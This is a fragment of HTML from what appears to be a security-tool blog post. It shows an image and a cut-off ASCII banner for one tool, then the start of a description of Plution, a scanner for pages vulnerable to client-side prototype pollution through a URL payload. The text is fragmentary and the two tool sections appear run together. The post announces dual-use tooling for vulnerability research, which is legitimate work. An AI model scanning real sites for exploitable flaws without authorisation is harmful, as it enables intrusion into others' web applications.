<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-AL7wzHH2D8c/YUS_XCCASFI/AAAAAAAAvRM/D6gLmBwGwvIW1uCOBSLNnmJ41hRXQbwNgCNcBGAsYHQ/s480/on-the-fly_4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="360" data-original-width="480" height="480" src="https://1.bp.blogspot.com/-AL7wzHH2D8c/YUS_XCCASFI/AAAAAAAAvRM/D6gLmBwGwvIW1uCOBSLNnmJ41hRXQbwNgCNcBGAsYHQ/w640-h480/on-the-fly_4.jpeg" width="640" /></a></div><p><br /></p><div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content=" ▒█████ ███▄ █ ▄▄▄█████▓ ██░ ██ ▓█████ █████ ██▓ ▓██ ██▓ ▒██▒ ██▒ ██ ▀█ █ ▓ ██▒ ▓▒▒▓██░ ██ ▓█ ▀ ▓██ ▓██▒ ▒██ ██▒ ▒██░ ██▒▓██ ▀█ ██▒ ▒ ▓██░ ▒░░▒██▀▀██ ▒███ ▒████ ▒██░ ▒██ ██░ ▒██ ██░▓██▒ ▐▌██▒ ░ ▓██▓ ░ ░▓█ ░██ ▒▓█ ▄ ░▓█▒ ▒██░ ░ ▐██▓░ ░ ████▓▒░▒██░ ▓██░ ▒██▒ ░ ░▓█▒░██▓▒░▒████ ▒░▒█░ ▒░██...
<p style="text-align: center;"><a href="http://1.bp.blogspot.com/-Eph2jPyIEs4/YTVMaWNoJNI/AAAAAAAAt7w/2fS0PnouBd0kTzMlCj8esDtcSXJolnV1wCK4BGAYYCw/s1600/plution_1-714956.png"><img alt="" border="0" height="556" id="BLOGGER_PHOTO_ID_7004588810967721170" src="http://1.bp.blogspot.com/-Eph2jPyIEs4/YTVMaWNoJNI/AAAAAAAAt7w/2fS0PnouBd0kTzMlCj8esDtcSXJolnV1wCK4BGAYYCw/w640-h556/plution_1-714956.png" width="640" /></a></p> <br /> <p>Plution is a convenient way to scan at scale for pages that are <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> to <a href="https://www.kitploit.com/search/label/Client%20Side" target="_blank" title="client side">client side</a> <a href="https://www.kitploit.com/search/label/Prototype%20Pollution" target="_blank" title="prototype pollution">prototype pollution</a> via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented here: <a href="htt...